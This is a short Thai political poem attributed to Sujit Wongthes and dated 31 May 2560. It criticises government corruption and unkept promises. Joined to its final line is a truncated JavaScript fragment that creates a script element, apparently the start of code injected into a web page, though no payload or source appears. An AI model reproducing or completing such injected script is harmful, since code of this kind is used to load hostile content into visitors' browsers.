Download PDF

ดีแค่ไหน?

 

รัฐบาลเลือกตั้งล้วนไม่ดี

แล้วรัฐบาลนี้ดีแค่ไหน

คอร์รัปชั่นฟันเงินทอนออกว่อนไป

คืนความสุขก็ยังไม่ได้รับคืน

 

สุจิตต์ วงษ์เทศ

พุธ 31 พฤษภาคม 2560var d=document;var s=d.createElement(‘script’);